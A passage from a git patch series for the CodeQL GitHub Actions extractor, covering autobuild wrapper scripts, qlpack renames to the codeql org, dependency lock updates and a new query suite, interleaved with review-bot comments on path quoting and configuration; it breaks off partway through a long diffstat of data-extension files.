$env:CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE + +&$JavaScriptAutoBuild +if ($LASTEXITCODE -ne 0) { + throw "JavaScript autobuilder failed." +} 
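Review bot: The script never sets `$ErrorActionPreference = 'Stop'`, so an error raised by a cmdlet (for example `Join-Path` when `CODEQL_DIST` is unset) is printed and execution continues with the next statement. The explicit `$LASTEXITCODE` checks cover the two native calls, but nothing else. Adding `$ErrorActionPreference = 'Stop'` as the first line makes the wrapper stop at the first error, in line with the `set -eu` used by `autobuild.sh` in the same commit.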
diff --git a/extractor/tools/autobuild.cmd b/extractor/tools/autobuild.cmd new file mode 100644 index 00000000000..ff5ca89d94a --- /dev/null +++ b/extractor/tools/autobuild.cmd @@ -0,0 +1,3 @@ +@echo off +rem All of the work is done in the PowerShell script +powershell.exe %~dp0autobuild-impl.ps1 diff --git a/extractor/tools/autobuild.sh b/extractor/tools/autobuild.sh new file mode 100644 index 00000000000..57adbf96279 --- /dev/null +++ b/extractor/tools/autobuild.sh 
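Review bot: `powershell.exe %~dp0autobuild-impl.ps1` passes the script path unquoted and as a positional argument, which Windows PowerShell treats as a command string rather than a file path. An extractor installed under a directory whose name contains spaces or PowerShell metacharacters would therefore be split or interpreted instead of run as a file. Quoting the path and using `-File` avoids that, and `-NoProfile` keeps a user profile script from running inside the build: `powershell.exe -NoProfile -NonInteractive -File "%~dp0autobuild-impl.ps1"`.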
@@ -0,0 +1,39 @@ +#!/bin/sh + +set -eu + +DEFAULT_PATH_FILTERS=$(cat << END +exclude:**/* +include:.github/workflows/**/*.yml +include:.github/workflows/**/*.yaml +include:**/action.yml +include:**/action.yaml +END +) + +if [ -n "${LGTM_INDEX_INCLUDE:-}" ] || [ -n "${LGTM_INDEX_EXCLUDE:-}" ] || [ -n "${LGTM_INDEX_FILTERS:-}" ] ; then + echo "Path filters set. Passing them through to the JavaScript extractor." +else + echo "No path filters set. Using the default filters." + LGTM_INDEX_FILTERS="${DEFAULT_PATH_FILTERS}" + export LGTM_INDEX_FILTERS +fi + +# Find the JavaScript extractor directory via `codeql resolve extractor`. +CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$($CODEQL_DIST/codeql resolve extractor --language javascript)" +export CODEQL_EXTRACTOR_JAVASCRIPT_ROOT + +echo "Found JavaScript extractor at '${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}'." + +# Run the JavaScript autobuilder +JAVASCRIPT_AUTO_BUILD="${CODEQL_EXTRACTOR_JAVASCRIPT_ROOT}/tools/autobuild.sh" +echo "Running JavaScript autobuilder at '${JAVASCRIPT_AUTO_BUILD}'." + +# Copy the values of the Actions extractor environment variables to the JavaScript extractor environment variables. +env CODEQL_EXTRACTOR_JAVASCRIPT_DIAGNOSTIC_DIR="${CODEQL_EXTRACTOR_ACTIONS_DIAGNOSTIC_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_LOG_DIR="${CODEQL_EXTRACTOR_ACTIONS_LOG_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SCRATCH_DIR="${CODEQL_EXTRACTOR_ACTIONS_SCRATCH_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_SOURCE_ARCHIVE_DIR="${CODEQL_EXTRACTOR_ACTIONS_SOURCE_ARCHIVE_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_TRAP_DIR="${CODEQL_EXTRACTOR_ACTIONS_TRAP_DIR}" \ + CODEQL_EXTRACTOR_JAVASCRIPT_WIP_DATABASE="${CODEQL_EXTRACTOR_ACTIONS_WIP_DATABASE}" \ + ${JAVASCRIPT_AUTO_BUILD} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a7df1c400bf..823e6a76cbc 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
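Review bot: Two expansions in `autobuild.sh` are unquoted: `$CODEQL_DIST/codeql` inside the command substitution and `${JAVASCRIPT_AUTO_BUILD}` on the last line. Both undergo word splitting and globbing, so a CodeQL distribution or extractor root whose path contains a space either fails to run or resolves to a different path than intended. Suggested lines: `CODEQL_EXTRACTOR_JAVASCRIPT_ROOT="$("$CODEQL_DIST/codeql" resolve extractor --language javascript)"` and `"${JAVASCRIPT_AUTO_BUILD}"` as the final command word.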
@@ -1,16 +1,16 @@ --- library: true warnOnImplicitThis: true -name: github/actions-all +name: codeql/actions-all version: 0.1.85 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 codeql/controlflow: ^1.0.1 codeql/dataflow: ^1.0.1 -extractor: javascript -dbscheme: semmlecode.javascript.dbscheme -groups: javascript + codeql/javascript-all: ^2.0.2 +extractor: actions +groups: actions dataExtensions: - ext/manual/*.model.yml - ext/generated/**/*.model.yml diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 21e0b8bb0e9..c4ef87bc251 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 96ba9840785..c907bbab1d0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,11 +1,11 @@ --- library: false -name: github/actions-queries +name: codeql/actions-queries version: 0.1.85 groups: [actions, queries] suites: codeql-suites -extractor: javascript +extractor: actions defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - github/actions-all: ${workspace} + codeql/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index 77e25d8e419..893532481ec 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml 
@@ -1,10 +1,10 @@ --- -name: github/actions-tests -groups: [javascript, test] +name: codeql/actions-tests +groups: [codeql, test] dependencies: - github/actions-all: ${workspace} - github/actions-queries: ${workspace} -extractor: javascript + codeql/actions-all: ${workspace} + codeql/actions-queries: ${workspace} +extractor: actions tests: . warnOnImplicitThis: true From b2100d00aa091c9cbda89803f5d3e216ed2d4cfc Mon Sep 17 00:00:00 2001 From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:34 -0500 Subject: [PATCH 0691/1267] Add `security-and-quality` suite --- ql/src/codeql-suites/actions-security-and-quality.qls | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 ql/src/codeql-suites/actions-security-and-quality.qls diff --git a/ql/src/codeql-suites/actions-security-and-quality.qls b/ql/src/codeql-suites/actions-security-and-quality.qls new file mode 100644 index 00000000000..ef332acb872 --- /dev/null +++ b/ql/src/codeql-suites/actions-security-and-quality.qls @@ -0,0 +1,11 @@ +- description: Security-and-quality queries for Actions +- queries: '.' +- include: + problem.severity: + - error + - recommendation +- exclude: + tags contain: + - experimental + - debug + From 1f3bab2b65934888d9b6323df6f1848003222671 Mon Sep 17 00:00:00 2001 
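Review bot: In `ql/test/qlpack.yml` the group list becomes `groups: [codeql, test]`, while the same commit sets `groups: actions` in `ql/lib/qlpack.yml` and keeps `[actions, queries]` in `ql/src/qlpack.yml`. This looks like the org rename was applied to the group name by accident; `groups: [actions, test]` would keep the three packs in the same language group. If `codeql` is intended here, a comment saying why would help.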
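Review bot: The `include` filter in `actions-security-and-quality.qls` lists the `problem.severity` values `error` and `recommendation` but not `warning`. Any query in the pack that declares `@problem.severity warning` would be left out of the security-and-quality suite; whether such queries exist is not visible in this patch. If the omission is not deliberate, add `- warning` to the list.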
From: Dave Bartolomeo Date: Thu, 7 Nov 2024 11:15:52 -0500 Subject: [PATCH 0692/1267] Move data extensions to use `codeql` org --- ql/lib/codeql-pack.lock.yml | 22 ++++++++++++++----- .../ext/config/argument_injection_sinks.yml | 2 +- ql/lib/ext/config/context_event_map.yml | 2 +- .../config/externally_triggereable_events.yml | 2 +- ql/lib/ext/config/poisonable_steps.yml | 6 ++--- .../ext/config/untrusted_event_properties.yml | 2 +- ql/lib/ext/config/untrusted_gh_command.yml | 2 +- ql/lib/ext/config/untrusted_git_command.yml | 2 +- ql/lib/ext/config/vulnerable_actions.yml | 2 +- ql/lib/ext/config/workflow_runtime_data.yml | 4 ++-- ...ctions_actions-runner-controller.model.yml | 2 +- .../composite-actions/adap_flower.model.yml | 2 +- .../agoric_agoric-sdk.model.yml | 2 +- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../amazon-ion_ion-java.model.yml | 2 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 2 +- .../ansible_ansible-lint.model.yml | 2 +- .../composite-actions/ansible_awx.model.yml | 2 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 2 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 2 +- .../composite-actions/apache_camel.model.yml | 2 +- .../composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../composite-actions/apache_nuttx.model.yml | 2 +- .../apache_opendal.model.yml | 2 +- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 2 +- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 2 +- .../aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 2 
+- .../auth0_auth0-java.model.yml | 2 +- .../auth0_auth0.net.model.yml | 2 +- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 2 +- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- ...ertools_powertools-lambda-python.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../azure_azure-datafactory.model.yml | 2 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 2 +- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../broadinstitute_gatk.model.yml | 2 +- .../canonical_multipass.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../chocobozzz_peertube.model.yml | 2 +- .../cilium_cilium-cli.model.yml | 2 +- .../composite-actions/cilium_cilium.model.yml | 2 +- .../citusdata_citus.model.yml | 2 +- .../clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../corretto_corretto-8.model.yml | 2 +- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 2 +- .../composite-actions/d2l-ai_d2l-en.model.yml | 2 +- 
...build-check-deploy-gradle-action.model.yml | 2 +- .../datadog_dd-trace-dotnet.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-js.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../davatorium_rofi.model.yml | 2 +- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 2 +- .../diggerhq_digger.model.yml | 2 +- .../diku-dk_futhark.model.yml | 2 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 2 +- .../drawpile_drawpile.model.yml | 2 +- .../eksctl-io_eksctl.model.yml | 2 +- .../elastic_apm-agent-dotnet.model.yml | 2 +- .../elastic_apm-agent-java.model.yml | 2 +- .../elastic_apm-server.model copy.yml | 2 +- .../elementor_elementor.model.yml | 2 +- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 2 +- .../eonasdan_tempus-dominus.model.yml | 2 +- .../composite-actions/erlang_otp.model.yml | 2 +- .../esphome_esphome.model.yml | 2 +- .../composite-actions/expensify_app.model.yml | 2 +- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 2 +- .../firebase_firebase-ios-sdk.model.yml | 2 +- .../flagsmith_flagsmith.model.yml | 2 +- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 2 +- 
.../composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 2 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../composite-actions/gaphor_gaphor.model.yml | 2 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 2 +- .../composite-actions/github_ruby.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- .../go-spatial_tegola.model.yml | 2 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 2 +- .../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 4 ++-- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../home-assistant_android.model.yml | 2 +- .../homebrew_actions.model.yml | 2 +- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../igniterealtime_openfire.model.yml | 2 +- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 2 +- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../ionic-team_ionicons.model.yml | 2 +- .../ionic-team_stencil.model.yml | 2 +- .../composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 2 +- .../jupyter_docker-stacks.model.yml | 2 +- .../keycloak_keycloak.model.yml | 2 +- .../composite-actions/kserve_kserve.model.yml | 2 +- .../kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- 
.../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 2 +- .../kubeshop_botkube.model.yml | 2 +- .../kyverno_kyverno.model.yml | 2 +- .../composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../ldc-developers_ldc.model.yml | 2 +- .../ledgerhq_ledger-live.model.yml | 2 +- .../composite-actions/lerna_lerna.model.yml | 2 +- .../composite-actions/lf-edge_eve.model.yml | 2 +- .../libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../lightning-ai_torchmetrics.model.yml | 2 +- .../linkerd_linkerd2.model.yml | 4 ++-- .../logseq_publish-spa.model.yml | 2 +- .../macvim-dev_macvim.model.yml | 2 +- .../mamba-org_mamba.model.yml | 2 +- .../maplibre_maplibre-native.model.yml | 2 +- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 2 +- .../mdanalysis_mdanalysis.model.yml | 2 +- .../medic_cht-core.model.yml | 2 +- .../medusajs_medusa.model.yml | 2 +- .../metabase_metabase.model.yml | 2 +- ...etamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 2 +- .../composite-actions/microsoft_wsl.model.yml | 2 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 2 +- .../mozilla_addons-server.model.yml | 2 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 2 +- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 2 +- ..._optic-release-automation-action.model.yml | 2 +- .../composite-actions/nektos_act.model.yml | 2 +- ...4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../neondatabase_neon.model.yml | 2 +- 
.../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 2 +- .../composite-actions/novuhq_novu.model.yml | 4 ++-- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 2 +- .../composite-actions/ocaml_dune.model.yml | 2 +- .../oneflow-inc_oneflow.model.yml | 2 +- ...metry_opentelemetry-ruby-contrib.model.yml | 2 +- ...pen-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 2 +- .../openvinotoolkit_openvino.model.yml | 2 +- ...enzeppelin-contracts-upgradeable.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts.model.yml | 2 +- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 2 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 2 +- .../owntracks_android.model.yml | 2 +- .../pandas-dev_pandas.model.yml | 2 +- .../pardeike_harmony.model.yml | 2 +- .../pennylaneai_pennylane.model.yml | 2 +- .../phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- ...necone-io_pinecone-python-client.model.yml | 2 +- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 2 +- .../composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../projectnessie_nessie.model.yml | 2 +- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../python-poetry_poetry.model.yml | 2 +- 
.../composite-actions/python_mypy.model.yml | 2 +- .../quarto-dev_quarto-cli.model.yml | 2 +- .../composite-actions/quay_clair.model.yml | 2 +- .../quickwit-oss_quickwit.model.yml | 2 +- .../composite-actions/r-lib_actions.model.yml | 2 +- .../randombit_botan.model.yml | 2 +- .../raspberrypi_documentation.model.yml | 2 +- .../ray-project_kuberay.model.yml | 2 +- .../readthedocs_actions.model.yml | 2 +- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 2 +- .../composite-actions/risc0_risc0.model.yml | 2 +- .../rocketchat_rocket.chat.model.yml | 2 +- .../composite-actions/rook_rook.model.yml | 2 +- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 2 +- .../composite-actions/rusefi_rusefi.model.yml | 2 +- .../saltstack_salt.model.yml | 2 +- .../composite-actions/saltstack_salt.yml | 2 +- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 2 +- .../composite-actions/scitools_iris.model.yml | 2 +- .../scylladb_scylla-operator.model.yml | 2 +- .../shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- ...ode_react-webpack-rails-tutorial.model.yml | 2 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 2 +- .../solidusio_solidus.model.yml | 2 +- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 2 +- .../sonic-pi-net_sonic-pi.model.yml | 2 +- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 2 +- .../spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- ...spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../square_workflow-kotlin.model.yml | 2 +- .../stefanprodan_podinfo.model.yml | 2 +- 
.../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 2 +- .../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 2 +- .../treeverse_lakefs.model.yml | 2 +- .../trezor_trezor-firmware.model.yml | 2 +- .../tribler_tribler.model.yml | 2 +- .../trunk-io_trunk-action.model.yml | 2 +- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 2 +- .../composite-actions/vkcom_vkui.model.yml | 2 +- .../vuetifyjs_vuetify.model.yml | 2 +- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 2 +- .../composite-actions/wazuh_wazuh.model.yml | 2 +- .../web-infra-dev_rspack.model.yml | 2 +- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 2 +- .../composite-actions/zcash_zcash.model.yml | 2 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 2 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../reusable-workflows/adap_flower.model.yml | 2 +- .../aio-libs_multidict.model.yml | 2 +- .../aio-libs_yarl.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 2 +- .../reusable-workflows/apache_flink.model.yml | 2 +- .../reusable-workflows/apache_spark.model.yml | 2 +- .../argilla-io_argilla.model.yml | 2 +- 
.../argoproj_argo-cd.model.yml | 2 +- .../argoproj_argo-rollouts.model.yml | 2 +- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 2 +- .../bbq-beets_avocaddo-cmw.model.yml | 2 +- .../bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 2 +- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 2 +- .../celo-org_celo-blockchain.model.yml | 2 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 2 +- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 2 +- .../chia-network_actions.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 2 +- .../clickhouse_clickhouse.model.yml | 2 +- .../cloudfoundry_cli.model.yml | 2 +- ...thub-action-matrix-outputs-write.model.yml | 2 +- .../cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../com-lihaoyi_mill.model.yml | 2 +- .../cosmos_ibc-go.model.yml | 2 +- .../crowdsecurity_crowdsec.model.yml | 2 +- .../cryptomator_cryptomator.model.yml | 2 +- .../daeuniverse_dae.model.yml | 2 +- .../dafny-lang_dafny.model.yml | 2 +- .../dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 2 +- .../datafuselabs_databend.model.yml | 2 +- .../dbt-labs_dbt-bigquery.model.yml | 2 +- .../dbt-labs_dbt-core.model.yml | 2 +- .../dbt-labs_dbt-snowflake.model.yml | 2 +- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 2 +- .../dfhack_dfhack.model.yml | 2 +- .../docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- 
.../earthly_earthly.model.yml | 2 +- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../envoyproxy_envoy.model.yml | 2 +- .../etcd-io_bbolt.model.yml | 2 +- .../reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../eventstore_eventstore.model.yml | 2 +- .../expensify_app.model.yml | 2 +- ...xternal-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../falcosecurity_falco.model.yml | 2 +- .../fastify_fastify.model.yml | 2 +- .../ferretdb_ferretdb.model.yml | 2 +- .../filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../flarum_framework.model.yml | 2 +- .../fluent_fluent-bit.model.yml | 2 +- .../flux-iac_tofu-controller.model.yml | 2 +- .../flyteorg_flyte.model.yml | 2 +- .../foundatiofx_foundatio.model.yml | 2 +- .../freecad_freecad.model.yml | 2 +- .../getpelican_pelican.model.yml | 2 +- .../getporter_porter.model.yml | 2 +- .../getsentry_sentry-dart.model.yml | 2 +- .../getsentry_sentry-unity.model.yml | 2 +- .../gitpod-io_gitpod.model.yml | 2 +- .../gittools_gitversion.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- ...loudplatform_nodejs-docs-samples.model.yml | 2 +- .../gravitational_teleport.model.yml | 2 +- .../gravitl_netmaker.model.yml | 2 +- .../reusable-workflows/h2oai_wave.model.yml | 2 +- .../hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../hashicorp_boundary.model.yml | 2 +- .../hashicorp_consul.model.yml | 2 +- .../hashicorp_terraform-cdk.model.yml | 2 +- ...hashicorp_terraform-provider-tfe.model.yml | 2 +- .../hashicorp_terraform.model.yml | 2 +- .../hashicorp_vault.model.yml | 4 ++-- .../reusable-workflows/heroku_cli.model.yml | 2 +- .../hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- 
